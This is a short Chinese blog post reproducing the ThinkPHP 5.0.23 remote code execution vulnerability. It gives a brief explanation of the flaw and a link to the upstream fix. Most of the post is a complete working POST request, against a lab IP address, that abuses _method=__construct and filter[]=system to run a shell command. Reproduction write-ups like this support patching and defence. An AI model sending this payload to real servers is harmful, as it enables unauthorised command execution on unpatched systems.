joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

ThinkPHP5 5.0.23 远程代码执行漏洞

发表于 2022-03-01 | 分类于漏洞复现 |

ThinkPHP5 5.0.23 远程代码执行漏洞

ThinkPHP是国内使用极为广泛的PHP开发框架。在其 5.0(<5.0.24) 版本中，框架在获取请求方法时，对其进行了错误的处理，使得攻击者可以调用 Request 类的任意方法，从而通过特定的利用链导致 RCE 漏洞。

参考：

https://github.com/top-think/framework/commit/4a4b5e64fa4c46f851b4004005bff5f3196de003

漏洞复现

访问http://192.168.44.132:8080，您将看到 ThinkPHP 的默认页面。

发送数据包并执行命令id：

POST /index.php?s=captcha HTTP/1.1
Host: 192.168.44.132:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2022/03/01/ThinkPHP5%205.0.23%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%